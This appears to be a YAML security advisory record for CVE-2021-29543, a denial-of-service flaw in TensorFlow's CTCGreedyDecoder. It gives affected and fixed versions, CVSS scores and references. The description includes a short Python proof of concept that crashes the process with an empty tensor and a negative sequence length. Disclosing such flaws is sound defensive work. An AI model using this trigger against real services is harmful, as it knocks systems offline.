---
identifier: "CVE-2021-29543"
identifiers:
- "CVE-2021-29543"
- "GHSA-fphq-gw9m-ghrv"
package_slug: "pypi/tensorflow-cpu"
title: "CHECK-fail in `CTCGreedyDecoder`"
description: "An attacker can trigger a denial of service via a `CHECK`-fail in `tf.raw_ops.CTCGreedyDecoder`:\n\n```python\nimport
  tensorflow as tf\n\ninputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32)\nsequence_length
  = tf.constant([-100, 17], shape=[2], dtype=tf.int32)\nmerge_repeated = False\n\ntf.raw_ops.CTCGreedyDecoder(inputs=inputs,
  sequence_length=sequence_length, merge_repeated=merge_repeated)\n```"
date: "2024-10-31"
pubdate: "2021-05-21"
affected_range: "<2.1.4||>=2.2.0,<2.2.3||>=2.3.0,<2.3.3||>=2.4.0,<2.4.2"
fixed_versions:
- "2.1.4"
- "2.2.3"
- "2.3.3"
- "2.4.2"
affected_versions: "All versions before 2.1.4, all versions starting from 2.2.0 before
  2.2.3, all versions starting from 2.3.0 before 2.3.3, all versions starting from
  2.4.0 before 2.4.2"
not_impacted: "All versions starting from 2.1.4 before 2.2.0, all versions starting
  from 2.2.3 before 2.3.0, all versions starting from 2.3.3 before 2.4.0, all versions
  starting from 2.4.2"
solution: "Upgrade to versions 2.1.4, 2.2.3, 2.3.3, 2.4.2 or above."
urls:
- "https://nvd.nist.gov/vuln/detail/CVE-2021-29543"
- "https://github.com/advisories/GHSA-fphq-gw9m-ghrv"
- "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fphq-gw9m-ghrv"
- "https://github.com/tensorflow/tensorflow/commit/ea3b43e98c32c97b35d52b4c66f9107452ca8fb2"
- "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-471.yaml"
- "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-669.yaml"
- "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-180.yaml"
- "https://github.com/tensorflow/tensorflow"
cvss_v2: "AV:L/AC:L/Au:N/C:N/I:N/A:P"
cvss_v3: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
uuid: "bd53d976-a100-4f32-a92a-55bec4107010"
cwe_ids:
- "CWE-617"
- "CWE-937"
- "CWE-1035"
